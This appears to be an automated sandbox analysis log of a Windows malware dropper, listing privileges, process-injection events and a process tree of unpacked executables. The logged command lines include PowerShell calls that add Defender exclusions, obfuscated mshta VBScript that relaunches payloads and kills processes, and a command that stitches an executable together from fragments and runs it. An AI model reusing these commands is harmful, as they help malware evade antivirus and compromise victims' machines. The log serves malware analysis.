Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07816149b72db00.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4660 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4660 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4660 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3452 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe
PID 3452 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe
PID 3452 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe
PID 3496 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3576 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3576 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3576 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3496 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4068 wrote to memory of 4416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe
PID 4068 wrote to memory of 4416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe
PID 4068 wrote to memory of 4416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe
PID 5036 wrote to memory of 4088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe
PID 5036 wrote to memory of 4088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe
PID 276 wrote to memory of 4764 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07a633a94f9.exe
PID 276 wrote to memory of 4764 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07a633a94f9.exe
PID 3160 wrote to memory of 4048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe
PID 3160 wrote to memory of 4048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe
PID 3160 wrote to memory of 4048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe
PID 3496 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4464 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe
PID 4464 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe
PID 4464 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe
PID 2268 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe
PID 2268 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe
PID 2268 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe

Processes

C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe

"C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue072fdbb8e4b2f5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07ef9e317e0f6ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07a633a94f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07b3bf87d8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07caa83bac5d15.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07e35cf558.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07267c17f2f5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue070aab9bc86b572.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue071e59dc8292b4ef1.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue0750373995e75.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07a633a94f9.exe

Tue07a633a94f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue0741bc096fd881d2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07b3bf87d8.exe

Tue07b3bf87d8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe

Tue07caa83bac5d15.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe

Tue07e35cf558.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe

Tue07ef9e317e0f6ae.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe

Tue072fdbb8e4b2f5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07816149b72db00.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe

Tue070aab9bc86b572.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe

Tue07267c17f2f5.exe

C:\Users\Admin\AppData\Local\Temp\is-BF9RV.tmp\Tue07e35cf558.tmp

"C:\Users\Admin\AppData\Local\Temp\is-BF9RV.tmp\Tue07e35cf558.tmp" /SL5="$E01DA,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe

Tue0741bc096fd881d2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe

Tue0750373995e75.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue071e59dc8292b4ef1.exe

Tue071e59dc8292b4ef1.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07816149b72db00.exe

Tue07816149b72db00.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07006d6b7c.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3496 -ip 3496

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe

Tue07006d6b7c.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 608

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe

Tue078a285ef7.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue078a285ef7.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe" ) do taskkill -F -Im "%~nXU"

C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe

SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )

C:\Windows\SysWOW64\taskkill.exe

taskkill -F -Im "Tue07267c17f2f5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3852 -ip 3852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 932

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 620

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4736 -ip 4736

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 644

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 620

C:\Windows\SysWOW64\control.exe

control .\FUEj5.QM

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 584

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 828

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 868

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe

"{path}"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1068

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1288

C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"

C:\Windows\system32\cmd.exe

/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Program Files (x86)\Installoid\installoid.exe

"C:\Program Files (x86)\Installoid\installoid.exe"

C:\Windows\system32\cmd.exe

/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4692 -ip 4692

C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c HelloWord.bat

C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe"

C:\Users\Admin\AppData\Roaming\instal.exe

C:\Users\Admin\AppData\Roaming\instal.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 264

